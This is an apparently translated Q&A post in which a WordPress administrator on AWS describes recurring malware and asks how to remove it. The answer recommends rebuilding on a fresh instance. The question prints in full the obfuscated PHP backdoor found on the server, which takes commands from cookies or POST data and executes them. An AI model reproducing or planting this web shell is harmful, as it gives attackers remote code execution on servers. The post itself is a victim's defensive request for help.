ubuntu - 恶意软件一次又一次地自主安装
问题描述
我们的 aws(托管 Wordpress 和自己的应用程序)实例上有一些恶意软件正在做奇怪的事情:
chmod 755 /var/www/html独立于以前的情况将index.html复制到index.html.bak.bak并删除index.html 当我在 index.html 上运行 ausearch 时,我被定向到由我们的应用程序管理的文件夹,该文件夹包含一个带有 randomname.php 的对象,例如 mqnwtxzg.php。此类 php 文件的内容:
$wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . $lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}在另一个随机文件夹中,我找到了这样的对象:/somefolder/.5d45a5b3.ico
我们会定期检查这些东西并删除所有这些奇怪的对象,但大约一天后,它们又回来了。唯一改变的是奇怪的对象现在有不同的名称并被放置在不同的文件夹中。
我们正在我们的系统上运行恶意软件扫描,它们会检测到这些对象,但到目前为止,没有什么能阻止它们回来。
有没有人遇到过类似的问题,有人可以推荐任何东西来摆脱这些东西吗?
任何人都可以指导我们找到可以提供帮助的人,即使该服务是可以支付的?
解决方案
而不是修复症状,您应该将注意力集中在确保您的 Wordpress 安装是最新版本并将任何插件更新到最新版本上。考虑到当前系统已被入侵,请勿尝试“打补丁”。它很可能是后门的。不要相信它。而是备份数据(例如数据库)并使用最新版本在新实例上重建 wordpress 站点。
看看https://wordpress.org/support/article/faq-my-site-was-hacked/和 https://wordpress.org/support/article/hardening-wordpress/
推荐阅读
- c++ - 对 boost::asio::ssl::context::context(boost::asio::ssl::context_base::method) 的未定义引用
- asp.net-core - 如何正确配置 IIS URL 重写
- ios - 给定一个文件路径(不一定是现有文件),我如何才能找到该文件是否在一个包中,以及包的路径?
- dask - 如何让 Dask 工作人员在完成后终止?
- oracle - 对象存储上不频繁层中的文件的外部表
- javascript - 如果用户在提示中输入特定数字,则显示消息“未输入分数”
- java - 用可读+可写 JTextPane 中的可视化表示替换特定的文本片段
- sql - Firebird 在更新时增加一个字段值
- flutter - 使用 Retrofit 获取原始 HTTP 响应 - Flutter
- javascript - 如何在尝试重新连接 Socket.IO(使用 RxJS)之前等待 HTTP 请求?